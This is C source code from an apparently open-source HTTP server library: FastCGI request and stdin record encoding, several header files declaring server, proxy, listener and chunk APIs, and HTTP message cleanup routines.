void * http_fcgimsg_open (void * vsrv, void * vhttpmsg)
{
FcgiSrv * srv = (FcgiSrv *)vsrv;
HTTPMsg * httpmsg = (HTTPMsg *)vhttpmsg;
FcgiMsg * msg = NULL;
if (!srv || !httpmsg) return NULL;
msg = http_fcgimsg_fetch(srv);
if (!msg) return NULL;
msg->httpmsg = httpmsg;
msg->req_body_flag = httpmsg->req_body_flag;
msg->req_body_length = httpmsg->req_body_length;
msg->req_body_iolen = 0;
msg->req_stream_sent = 0;
msg->reqsent = 0;
http_fcgimsg_request_encode(msg);
http_fcgimsg_abort_encode(msg);
chunk_prepend_bufptr(msg->req_body_chunk, frameP(msg->fcgi_request), frameL(msg->fcgi_request), 1);
return msg;
}
int http_fcgimsg_close (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
if (http_fcgisrv_msg_del(msg->srv, msg->msgid) != msg) {
return -100;
}
return http_fcgimsg_recycle(msg);
}
int http_fcgimsg_abort (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
return 0;
}
void fcgi_header_encode (frame_p frm, uint8 type, uint16 reqid, uint16 contlen)
{
uint8 padding = 0;
frame_put_last(frm, FCGI_PROTO_VERSION);
frame_put_last(frm, type);
/* request id */
frame_put_last(frm, ((reqid >> 8) & 0xFF));
frame_put_last(frm, (reqid & 0xFF));
/* content-length */
frame_put_last(frm, ((contlen >> 8) & 0xFF));
frame_put_last(frm, (contlen & 0xFF));
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
frame_put_last(frm, padding);
frame_put_last(frm, 0x00);
}
int fcgi_header_encode2(uint8 * pbyte, uint8 type, uint16 reqid, uint16 contlen)
{
int len = 0;
uint8 padding = 0;
pbyte[len++] = FCGI_PROTO_VERSION;
pbyte[len++] = type;
/* request id */
pbyte[len++] = (reqid >> 8) & 0xFF;
pbyte[len++] = reqid & 0xFF;
/* content-length */
pbyte[len++] = (contlen >> 8) & 0xFF;
pbyte[len++] = contlen & 0xFF;
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
pbyte[len++] = padding;
pbyte[len++] = 0x00;
return len;
}
void fcgi_param_header_copy (frame_p frm, void * pbyte, int len, int isname)
{
int i;
uint8 * p = (uint8 *)pbyte;
if (!p || len <= 0) return;
for (i = 0; i < len; i++) {
if (isname) {
if (p[i] == '-')
frame_put_last(frm, '_');
else
frame_put_last(frm, adf_toupper(p[i]));
} else {
frame_put_last(frm, p[i]);
}
}
}
void fcgi_param_nvlen_encode (frame_p frm, int len)
{
if (len < 0x80) {
frame_put_last(frm, (uint8)len);
} else {
frame_put_last(frm, (uint8)( (len >> 24) | 0x80 ) );
frame_put_last(frm, (uint8)(len >> 16));
frame_put_last(frm, (uint8)(len >> 8));
frame_put_last(frm, (uint8)len);
}
}
void fcgi_http_header_param_encode (frame_p frm, HTTPMsg * httpmsg)
{
int i, num;
HeaderUnit * punit = NULL;
char key[168];
strcpy(key, "HTTP_");
num = arr_num(httpmsg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(httpmsg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
str_secpy(key + 5, sizeof(key) - 6, HUName(punit), punit->namelen);
fcgi_param_nvlen_encode(frm, punit->namelen + 5);
fcgi_param_nvlen_encode(frm, punit->valuelen);
fcgi_param_header_copy(frm, key, punit->namelen + 5, 1);
fcgi_param_header_copy(frm, HUValue(punit), punit->valuelen, 0);
}
}
void fcgi_predefined_param_encode (frame_p frm, HTTPMsg * httpmsg)
{
HTTPMgmt * mgmt = NULL;
int i, num, ret;
void * jpara = NULL;
char * name = NULL;
int namelen = 0;
char * value = NULL;
int valuelen = 0;
char buf[512];
if (!httpmsg) return;
mgmt = (HTTPMgmt *)httpmsg->httpmgmt;
if (!mgmt) return;
ret = json_mget_obj(mgmt->cnfjson, "http.fastcgi.params", -1, &jpara);
if (ret <= 0 || !jpara) return;
num = json_num(jpara);
for (i = 0; i < num; i++) {
ret = json_iter(jpara, i, (void **)&name, &namelen, (void **)&value, &valuelen, NULL);
if (ret < 0) continue;
if (!name || namelen <= 0) continue;
if (strcasecmp(name, "Content_Length") == 0) {
if (httpmsg->req_body_length == 0) {
buf[0] = '\0';
valuelen = 0;
} else {
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "%I64d", httpmsg->req_body_length);
#else
sprintf(buf, "%lld", httpmsg->req_body_length);
#endif
valuelen = strlen(buf);
}
} else {
if (value && valuelen) {
valuelen = http_var_copy(httpmsg, value, valuelen, buf, sizeof(buf)-1,
NULL, 0, NULL, 0);
}
}
fcgi_param_nvlen_encode(frm, namelen);
fcgi_param_nvlen_encode(frm, valuelen);
fcgi_param_header_copy(frm, name, namelen, 1);
fcgi_param_header_copy(frm, buf, valuelen, 0);
}
return;
}
int http_fcgimsg_request_encode (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
int para_pos = 0;
int body_pos = 0;
int paralen = 0;
int padding = 0;
if (!msg) return -1;
/* encode begin-request header */
fcgi_header_encode(msg->fcgi_request, FCGI_BEGIN_REQUEST, 0x01/*msg->msgid*/, 8);
/* encode begin-request body */
frame_put_last(msg->fcgi_request, ((msg->fcgi_role >> 8) & 0xFF));
frame_put_last(msg->fcgi_request, (msg->fcgi_role & 0xFF));
if (msg->fcgi_keep_alive)
frame_put_last(msg->fcgi_request, 0x01);
else
frame_put_last(msg->fcgi_request, 0x00);
frame_append_nbytes(msg->fcgi_request, 0x00, 5);
para_pos = frameL(msg->fcgi_request);
/* reserved 8 bytes for FCGI-PARAM header */
frame_append_nbytes(msg->fcgi_request, 0x00, 8);
/* predefined PARAMs in configuration file encoded as FCGI_PARAM body */
fcgi_predefined_param_encode(msg->fcgi_request, msg->httpmsg);
/* HTTPMsg header encoded as FCGI_PARAM body */
fcgi_http_header_param_encode(msg->fcgi_request, msg->httpmsg);
body_pos = frameL(msg->fcgi_request) - 8;
paralen = body_pos - para_pos;
padding = paralen % 8;
if (padding > 0) padding = 8 - padding;
frame_append_nbytes(msg->fcgi_request, 0x00, padding);
/* re-encoded the FCGI_PARAMS header based on the actual PARAMS body length */
fcgi_header_encode2((uint8 *)frameP(msg->fcgi_request) + para_pos, FCGI_PARAMS, 1/*msg->msgid*/, paralen);
/* encode one 0-body_length FCGI_PARAMS headers */
fcgi_header_encode(msg->fcgi_request, FCGI_PARAMS, /*msg->msgid*/1, 0);
msg->req_header_length = frameL(msg->fcgi_request);
return msg->req_header_length;
}
int http_fcgimsg_abort_encode (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
return fcgi_header_encode2(msg->fcgi_abort, FCGI_ABORT_REQUEST, /*msg->msgid*/1, 0);
}
void fcgi_stdin_encode (frame_p frm, uint16 msgid, HTTPMsg * httpmsg)
{
static int MAXCONT = 65528; //8-byte alignment assuring that no padding is appended
int64 len = 0;
int64 pos = 0;
int i, num = 0;
uint16 contlen = 0;
uint8 * pbody = NULL;
pbody = frameP(httpmsg->req_body_stream);
len = httpmsg->req_body_length;
num = (len + MAXCONT - 1) / MAXCONT;
for (i = 0; i < num; i++) {
if (i == num - 1) contlen = len % MAXCONT;
else contlen = MAXCONT;
fcgi_header_encode(frm, FCGI_STDIN, msgid, contlen);
frame_put_nlast(frm, pbody + pos, contlen);
pos += contlen;
}
fcgi_header_encode(frm, FCGI_STDIN, msgid, 0);
}
int http_fcgimsg_stdin_init (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
msg->fcgi_stdin_num = 0;
memset(msg->fcgi_stdin_header, 0, sizeof(msg->fcgi_stdin_header));
memset(msg->fcgi_stdin_body, 0, sizeof(msg->fcgi_stdin_body));
memset(msg->fcgi_stdin_body_len, 0, sizeof(msg->fcgi_stdin_body_len));
memset(msg->fcgi_stdin_padding, 0, sizeof(msg->fcgi_stdin_padding));
memset(msg->fcgi_stdin_padding_len, 0, sizeof(msg->fcgi_stdin_padding_len));
return 0;
}
int http_fcgimsg_stdin_encode (void * vmsg, void * pbyte, int bytelen, int end)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
static int MAXCONT = 65528; //8-byte alignment assuring that no padding is appended
static uint8 padarr[8] = {0};
int i, pos = 0;
int num = 0;
uint16 contlen = 0;
int padding = 0;
if (!msg) return -1;
num = (bytelen + MAXCONT - 1) / MAXCONT;
for (i = 0, pos = 0; i < num && msg->fcgi_stdin_num < 32; i++) {
if (i == num - 1) contlen = bytelen % MAXCONT;
else contlen = MAXCONT;
fcgi_header_encode2(msg->fcgi_stdin_header[msg->fcgi_stdin_num], FCGI_STDIN, /*msg->msgid*/1, contlen);
msg->fcgi_stdin_body_len[msg->fcgi_stdin_num] = contlen;
msg->fcgi_stdin_body[msg->fcgi_stdin_num] = (uint8 *)pbyte + pos;
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
msg->fcgi_stdin_padding_len[msg->fcgi_stdin_num] = padding;
msg->fcgi_stdin_padding[msg->fcgi_stdin_num] = padarr;
msg->fcgi_stdin_num++;
pos += contlen;
}
if (end)
http_fcgimsg_stdin_end_encode(msg);
return pos;
}
int http_fcgimsg_stdin_end_encode (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
if (!msg) return -1;
fcgi_header_encode2(msg->fcgi_stdin_header[msg->fcgi_stdin_num], FCGI_STDIN, /*msg->msgid*/1, 0);
msg->fcgi_stdin_body_len[msg->fcgi_stdin_num] = 0;
msg->fcgi_stdin_body[msg->fcgi_stdin_num] = NULL;
msg->fcgi_stdin_num++;
return 0;
}
int http_fcgimsg_stdin_body_sentnum (void * vmsg, int sentlen)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
int i = 0;
int sentbody = 0;
int acclen = 0;
if (!msg) return 0;
for (i = 0, sentbody = 0; i < msg->fcgi_stdin_num; i++) {
acclen += 8; //header length 8 bytes
if (acclen >= sentlen) return sentbody;
acclen += msg->fcgi_stdin_body_len[i];
if (acclen >= sentlen) {
sentbody += msg->fcgi_stdin_body_len[i] - (acclen - sentlen);
return sentbody;
}
sentbody += msg->fcgi_stdin_body_len[i];
acclen += msg->fcgi_stdin_padding_len[i];
if (acclen >= sentlen) return sentbody;
}
return sentbody;
}
int http_fcgimsg_pre_crash (void * vmsg, int status)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
HTTPMsg * httpmsg = NULL;
if (!msg) return -1;
if (!msg->httpmsg) return -2;
httpmsg = (HTTPMsg *)msg->httpmsg;
if (!msg->got_end_request && !httpmsg->issued) {
httpmsg->fastcgi = 0;
httpmsg->fcgimsg = NULL;
httpmsg->SetStatus(httpmsg, status, NULL);
httpmsg->Reply(httpmsg);
}
msg->httpmsg = NULL;
return 0;
}
int http_fcgimsg_stdin_encode_chunk (void * vmsg, void * pbyte, int bytelen, void * porig, int end)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
static int MAXCONT = 65528; //8-byte alignment assuring that no padding is appended
static uint8 padarr[8] = {0};
uint8 hdrbuf[16];
int i, pos = 0;
int num = 0;
uint16 contlen = 0;
int padding = 0;
if (!msg) return -1;
num = (bytelen + MAXCONT - 1) / MAXCONT;
for (i = 0, pos = 0; i < num; i++) {
if (i == num - 1) contlen = bytelen % MAXCONT;
else contlen = MAXCONT;
fcgi_header_encode2(hdrbuf, FCGI_STDIN, /*msg->msgid*/1, contlen);
chunk_add_buffer(msg->req_body_chunk, hdrbuf, 8);
chunk_add_bufptr(msg->req_body_chunk, (uint8 *)pbyte + pos, contlen, porig);
padding = contlen % 8;
if (padding > 0) padding = 8 - padding;
chunk_add_buffer(msg->req_body_chunk, padarr, padding);
pos += contlen;
}
if (end)
http_fcgimsg_stdin_end_encode_chunk(msg);
return pos;
}
int http_fcgimsg_stdin_end_encode_chunk (void * vmsg)
{
FcgiMsg * msg = (FcgiMsg *)vmsg;
uint8 hdrbuf[16];
if (!msg) return -1;
fcgi_header_encode2(hdrbuf, FCGI_STDIN, /*msg->msgid*/1, 0);
chunk_add_buffer(msg->req_body_chunk, hdrbuf, 8);
/* set the current size as the end-size of chunk object */
chunk_set_end(msg->req_body_chunk);
return 0;
}
<|start_filename|>include/http_chunk.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CHUNK_H_
#define _HTTP_CHUNK_H_
#include "chunk.h"
#ifdef __cplusplus
extern "C" {
#endif
typedef struct http_buf {
uint8 * pbgn;
int len;
uint8 * body_bgn;
int body_len;
uint8 alloc;
} HTTPBuf;
typedef struct http_chunk_item {
int64 chksize;
int64 chklen;
int64 recvsize;
int64 recvlen;
uint8 gotall;
arr_t * buf_list;
} HTTPChunkItem;
typedef struct http_chunk {
uint8 gotall;
uint8 gotallbody;
int64 chksize; //byte num including chunk size line, chunk body, chunk header, trailer
int64 chklen; //actual, available content
int64 recvsize; //byte num including chunk size line, chunk body, chunk header, trailer
int64 recvlen; //actual, available content
int chknum;
/* if the chunk got all bytes, append it to list */
HTTPChunkItem * curitem;
arr_t * item_list;
int enthdrsize;
HTTPBuf * enthdr;
chunk_t * chunk;
} HTTPChunk;
void * http_chunk_alloc ();
void http_chunk_free (void * vchk);
int http_chunk_zero (void * vchk);
void * http_chunk_dup (void * vchk);
chunk_t * http_chunk_obj (void * vchk);
int http_chunk_add_bufptr (void * vchk, void * pbgn, int len, int * rmlen);
int http_chunk_gotall (void * vchk);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_cli_io.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CLI_IO_H_
#define _HTTP_CLI_IO_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_cli_con_crash (void * vcon, int closelad);
int http_cli_accept (void * vmgmt, void * listendev);
int http_cli_recv (void * vcon);
int http_cli_recv_parse (void * vcon);
int http_reqbody_handle (void * vmsg);
int http_cli_reqbody_parse (void * vcon, void * vmsg);
int http_cli_send_probe (void * vcon);
int http_cli_send (void * vcon);
int http_cli_send_final (void * vmsg);
int http_cli_con_lifecheck (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_srv.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SRV_H_
#define _HTTP_SRV_H_
#ifdef __cplusplus
extern "C" {
#endif
#define t_httpsrv_life 2201
typedef struct http_srv {
void * res[4];
ulong srvid;
char ip[41];
int port;
uint8 ssl_link;
void * sslctx;
uint8 sslctx_alloc;
int active; //0-cannot connect to 1-can connect to
time_t active_stamp;
CRITICAL_SECTION msgCS;
void * msg_fifo;
int maxcon;
CRITICAL_SECTION conCS;
hashtab_t * con_table;
rbtree_t * con_tree;
time_t stamp;
void * life_timer;
void * mgmt;
} HTTPSrv;
int http_mgmt_srv_init (void * vmgmt);
int http_mgmt_srv_clean(void * vmgmt);
int http_mgmt_srv_add (void * vmgmt, void * vsrv);
void * http_mgmt_srv_get (void * vmgmt, ulong srvid);
void * http_mgmt_srv_del (void * vmgmt, ulong srvid);
void * http_mgmt_srv_find (void * vmgmt, char * ip, int port);
void * http_srv_open (void * vmgmt, char * ip, int port, int ssl_link, int maxcon);
int http_srv_close(void * vsrv);
void * http_srv_connect (void * vsrv);
int http_srv_msg_send (void * vmsg);
int http_srv_msg_dns_cb (void * vmsg, char * name, int len, void * cache, int status);
int http_srv_msg_dns (void * vmsg, void * cb);
void * http_srv_ssl_ctx_get (void * vsrv, void * vcon);
int http_srv_set_active (void * vsrv, int active);
int http_srv_get_active (void * vsrv, time_t * lasttick);
int http_srv_msg_push (void * vsrv, void * vmsg);
void * http_srv_msg_pull (void * vsrv);
int http_srv_msg_num (void * vsrv);
int http_srv_con_add (void * vsrv, void * vpcon);
void * http_srv_con_del (void * vsrv, ulong conid);
int http_srv_con_num (void * vsrv);
int http_srv_lifecheck (void * vsrv);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_listen.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_LISTEN_H_
#define _HTTP_LISTEN_H_
#ifdef __cplusplus
extern "C" {
#endif
#define SERV_SERVER 1
#define SERV_UPLOAD 2
#define SERV_PROXY 4
#define SERV_FASTCGI 8
#define SERV_CALLBACK 16
#define MATCH_DEFAULT 0
#define MATCH_EXACT 1
#define MATCH_PREFIX 2
#define MATCH_REGEX_CASE 3
#define MATCH_REGEX_NOCASE 4
typedef int RequestDiag (void * vmsg);
typedef int ResponseDiag (void * vmsg);
typedef void * HTTPCBInit (void * httpmgmt, int argc, char ** argv);
typedef void HTTPCBClean (void * hcb);
typedef int HTTPCBHandler (void * cbobj, void * vmsg, char * tplfile);
typedef struct error_page {
char * err400[20]; /* 40X-400 as index */
char * err500[20]; /* 50X-500 as index */
char * root;
} ErrorPage;
typedef struct http_location {
char * path;
char root[256]; //root path
/* indicates that path is allocated and need to be freed when cleaning resources */
unsigned path_dup : 2;
/* 0-default loc 1-exact matching 2-prefix matching 3-regex matching case censitive
4-regex matching ignoring case */
unsigned matchtype : 6;
/* 1-SERV_SERVER 2-SERV_UPLOAD 4-SERV_PROXY 8-SERV_FASTCGI */
unsigned type : 16; //1-server 2-upload 4-proxy 8-fastcgi 16-callback
unsigned indexnum : 8;
char * index[8];
char * passurl; //URL
uint8 cache;
char * cachefile;
arr_t * script_list;
arr_t * reply_script_list;
void * jsonobj;
HTTPCBHandler * cbfunc;
void * cbobj;
char * tplfile;
} HTTPLoc;
void * http_loc_alloc (char * path, int pathlen, uint8 pathdup, int matchtype, int servtype, char * root);
void http_loc_free (void * vloc);
int http_loc_set_root (void * vloc, char * root, int rootlen);
int http_loc_set_index (void * vloc, char ** indexlist, int num);
int http_loc_set_proxy (void * vloc, char * passurl, char * cachefile);
int http_loc_set_fastcgi (void * vloc, char * passurl);
int http_loc_cmp_path (void * vloc, void * vpath);
int http_loc_build (void * vhost, void * jhost);
typedef struct http_host {
char hostname[168];
int type; //1-server 4-proxy 8-fastcgi, to be used in future
char * passurl; //forwarding URL, to be used in future
char root[256];
uint8 gzip; //to be used in future
char * cert;
char * prikey;
char * cacert;
void * sslctx;
ErrorPage errpage;
CRITICAL_SECTION hostCS;
/* location exact match with request path by hash_table */
hashtab_t * exact_loc_table;
/* prefix matching with the request path, ploc instances
* stored in arr_t, but matching is used Wu-Manber algorithm */
arr_t * prefix_loc_list;
void * prefix_actrie;
/* regular expression matching with the request path, ploc instance
* stored in arr_t. traverse every member for path matching */
arr_t * regex_loc_list;
arr_t * regex_list;
HTTPLoc * uploadloc; //to be used in future
HTTPLoc * defaultloc;
arr_t * script_list;
arr_t * reply_script_list;
void * jsonobj;
/* page template parsing and subsituding table */
CRITICAL_SECTION texttplCS;
hashtab_t * texttpl_tab;
CRITICAL_SECTION listtplCS;
hashtab_t * listtpl_tab;
} HTTPHost;
void * http_host_alloc (char * hostn, int hostlen);
void http_host_free (void * vhost);
void * http_host_create (void * vhl, char * hostn, int hostlen, char * root,
char * cert, char * prikey, char * cacert);
int http_host_cmp (void * vhost, void * vname);
int http_host_build (void * vhl, void * jhl);
typedef struct http_listen {
void * res[2];
char localip[41];
int port;
uint8 forwardproxy;
uint8 ssl_link;
char * cert;
char * prikey;
char * cacert;
void * sslctx;
/* callback function from a dynamic library */
char * cblibfile;
int cbargc;
char * cbargv[16];
#ifdef UNIX
void * cbhandle;
#endif
#if defined(_WIN32) || defined(_WIN64)
HMODULE cbhandle;
#endif
HTTPCBInit * cbinit;
HTTPCBHandler * cbfunc;
HTTPCBClean * cbclean;
void * cbobj;
void * mlisten;
CRITICAL_SECTION hlCS;
hashtab_t * host_table;
HTTPHost * defaulthost;
RequestDiag * reqdiag;
void * reqdiagobj;
arr_t * script_list;
arr_t * reply_script_list;
void * jsonobj;
void * httpmgmt;
} HTTPListen;
void * http_listen_alloc (char * localip, int port, uint8 fwdpxy);
void http_listen_free (void * vhl);
int http_listen_ssl_ctx_set (void * vhl, char * cert, char * prikey, char * cacert);
void * http_listen_ssl_ctx_get (void * vhl);
void * http_listen_host_get (void * vhl, char * servname);
/* callback libfile format: /opt/app/lib/appmgmt.so app.conf */
int http_listen_cblibfile_set (void * vhl, char * cblibfile);
int http_listen_init (void * vmgmt);
int http_listen_cleanup (void * vmgmt);
void * http_listen_add (void * vmgmt, char * localip, int port, uint8 fwdpxy);
int http_listen_start_all (void * vmgmt);
void * http_ssl_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy,
uint8 ssl, char * cert, char * prikey, char * cacert, char * libfile);
void * http_listen_start (void * vmgmt, char * localip, int port, uint8 fwdpxy, char * libfile);
int http_listen_num (void * vmgmt);
void * http_listen_get (void * vmgmt, int index);
void * http_listen_find (void * vmgmt, char * localip, int port);
int http_listen_stop (void * vmgmt, char * localip, int port);
int http_listen_check_self (void * vmgmt, char * host, int hostlen, char * dstip, int dstport);
int http_listen_build (void * vmgmt);
void * http_host_instance (void * vmsg);
void * http_loc_instance (void * vmsg);
int http_loc_passurl_get (void * vmsg, int servtype, char * url, int urllen);
int http_real_file (void * vmsg, char * path, int len);
int http_real_path (void * vmsg, char * path, int len);
void * http_prefix_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile);
void * http_exact_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len,
char * root, void * cbfunc, void * cbobj, void * tplfile) ;
void * http_regex_loc (void * vhl, char * hostn, int hostlen, char * matstr, int len, int ignorecase,
char * root, void * cbfunc, void * cbobj, void * tplfile);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_proxy.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_PROXY_H_
#define _HTTP_PROXY_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_proxy_handle (void * vmsg);
int http_proxy_check (void * vmsg, void * purl, int urlen);
int http_proxy_srv_send_start (void * vproxymsg);
int http_proxy_srvmsg_dns_cb (void * vproxymsg, char * name, int len, void * cache, int status);
void * http_proxy_srvmsg_open (void * vmsg, char * url, int urllen);
int http_proxy_srv_send (void * vsrvcon, void * vsrvmsg);
int http_proxy_climsg_dup (void * vsrvmsg);
int http_proxy_cli_send (void * vclicon, void * vclimsg);
int http_proxy_srvbody_del (void * vsrvcon, void * vsrvmsg);
void * http_proxy_connect_tunnel (void * vcon, void * vmsg);
int http_tunnel_srv_send (void * vclicon, void * vsrvcon);
int http_tunnel_cli_send (void * vsrvcon, void * vclicon);
int http_proxy_climsg_header (void * vclimsg);
int http_proxy_cli_cache_send (void * vclicon, void * vclimsg);
int http_proxy_srv_cache_store(void * vclicon, void * vclimsg);
void * http_proxy_srv_cache_send (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_response.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_RESPONSE_H_
#define _HTTP_RESPONSE_H_
#ifdef __cplusplus
extern "C" {
#endif
int http_res_getstatus (void * vmsg);
int http_res_status_decode (void * vmsg, char * pline, int linelen);
int http_res_status_encode (void * vmsg, frame_p frame);
int http_res_statusline_set (void * vmsg, char * ver, int verlen, int status, char * defreason);
int http_res_parse_header (void * vmsg, int has_statusline);
int http_res_encoding (void * vmsg);
int print_response (void * vmsg, FILE * fp);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_do.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_DO_H_
#define _HTTP_DO_H_
#ifdef __cplusplus
extern "C" {
#endif
/* auto-redirect to new Location when response status is 301/302 */
int http_redirect_request (void * vmsg);
/* sending HTTP Request to HTTPServer and receiving the response */
int do_http_request (void * vmsg);
void * do_http_get_msg (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * procpara, uint64 proccbval,
char * resfile, long resoff);
void * do_http_get (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * procpara, uint64 proccbval,
char * resfile, long resoff);
void * origin_http_get (void * vmgmt, char * url, int urllen,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * procpara, uint64 proccbval,
char * resfile, long resoff, uint64 start, uint64 size,
char * route, char * opaque);
void * do_http_post_msg (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff);
void * do_http_post (void * vmgmt, char * url, int urllen, char * mime,
char * body, int bodylen,
char * fname, long offset, long length,
void * resfunc, void * para, void * cbval,
void * rcvprocfunc, void * rcvpara, uint64 rcvcbval,
void * sndprocfunc, void * sndpara, uint64 sndcbval,
char * resfile, long resoff);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_msg.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_msg.h"
#include "http_con.h"
#include "http_request.h"
#include "http_response.h"
#include "http_chunk.h"
#include "http_variable.h"
#include "http_cache.h"
#include "http_log.h"
#include "http_form.h"
#include "http_dispdir.h"
#include "http_cgi.h"
#include "http_pagetpl.h"
extern HTTPMgmt * gp_httpmgmt;
int http_msg_cmp_http_msg(void * a, void * b)
{
HTTPMsg * msga = (HTTPMsg *)a;
HTTPMsg * msgb = (HTTPMsg *)b;
if (!msga || !msgb) return -1;
if (msga->msgid == msgb->msgid) return 0;
if (msga->msgid > msgb->msgid) return 1;
return -1;
}
int http_msg_cmp_msgid (void * a, void * pat)
{
HTTPMsg * msg = (HTTPMsg *)a;
ulong msgid = *(ulong *)pat;
if (!msg) return -1;
if (msg->msgid == msgid) return 0;
if (msg->msgid > msgid) return 1;
return -1;
}
ulong http_msg_hash_msgid (void * key)
{
ulong msgid = *(ulong *)key;
return msgid;
}
int http_msg_free (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
if (!msg) return -1;
if (msg->script_var_tab) {
ht_free_all(msg->script_var_tab, var_obj_free);
msg->script_var_tab = NULL;
}
http_header_delall(msg, 0);
http_header_delall(msg, 1);
/* clear the buffer/data management resources which handle the http request */
http_uri_free(msg->uri);
http_uri_free(msg->absuri);
http_uri_free(msg->docuri);
frame_delete(&msg->req_header_stream);
frame_delete(&msg->req_body_stream);
frame_delete(&msg->req_stream);
ht_free(msg->req_header_table);
arr_free(msg->req_header_list);
msg->req_multipart = 0;
if (msg->req_file_handle) {
native_file_close(msg->req_file_handle);
msg->req_file_handle = NULL;
}
if (msg->req_file_cache && msg->req_file_name) {
unlink(msg->req_file_name);
kfree(msg->req_file_name);
msg->req_file_name = NULL;
}
msg->req_file_cache = 0;
http_req_delallcookie(msg);
ht_free(msg->req_cookie_table);
if (msg->req_chunk) {
http_chunk_free(msg->req_chunk);
msg->req_chunk = NULL;
}
if (msg->req_body_chunk) {
chunk_free(msg->req_body_chunk);
msg->req_body_chunk = NULL;
}
if (msg->req_rcvs_list) {
arr_pop_free(msg->req_rcvs_list, frame_free);
msg->req_rcvs_list = NULL;
}
if (msg->req_formlist) {
arr_pop_free(msg->req_formlist, http_form_free);
msg->req_formlist = NULL;
}
if (msg->req_form_kvobj) {
kvpair_clean(msg->req_form_kvobj);
msg->req_form_kvobj = NULL;
}
if (msg->req_form_json) {
json_clean(msg->req_form_json);
msg->req_form_json = NULL;
}
if (msg->req_query_kvobj) {
kvpair_clean(msg->req_query_kvobj);
msg->req_query_kvobj = NULL;
}
if (msg->partial_list) {
vstar_free(msg->partial_list);
msg->partial_list = NULL;
}
if (msg->fwdurl) {
kfree(msg->fwdurl);
msg->fwdurl = NULL;
}
msg->fwdurllen = 0;
/* clear the buffer/data management resources which handle the http response */
frame_delete(&msg->res_line);
frame_delete(&msg->res_header_stream);
frame_delete(&msg->res_body_stream);
frame_delete(&msg->res_stream);
if (msg->res_chunk) {
http_chunk_free(msg->res_chunk);
msg->res_chunk = NULL;
}
if (msg->res_body_chunk) {
chunk_free(msg->res_body_chunk);
msg->res_body_chunk = NULL;
}
if (msg->res_rcvs_list) {
arr_pop_free(msg->res_rcvs_list, frame_free);
msg->res_rcvs_list = NULL;
}
ht_free(msg->res_header_table);
arr_free(msg->res_header_list);
if (msg->res_file_handle) {
native_file_close(msg->res_file_handle);
msg->res_file_handle = NULL;
}
if (msg->res_file_name) {
kfree(msg->res_file_name);
msg->res_file_name = NULL;
}
if (msg->res_file_cache == 1) {
//unlink(msg->res_file_name);
}
if (msg->res_cache_info) {
cache_info_close(msg->res_cache_info);
msg->res_cache_info = NULL;
}
msg->res_file_cache = 0;
msg->res_store_file = NULL;
msg->res_store_offset = 0;
msg->res_recv_procnotify = NULL;
msg->res_recv_procnotify_para = NULL;
msg->res_recv_procnotify_cbval= 0;
msg->req_send_procnotify = NULL;
msg->req_send_procnotify_para = NULL;
msg->req_send_procnotify_cbval = 0;
kfree(msg);
return 0;
}
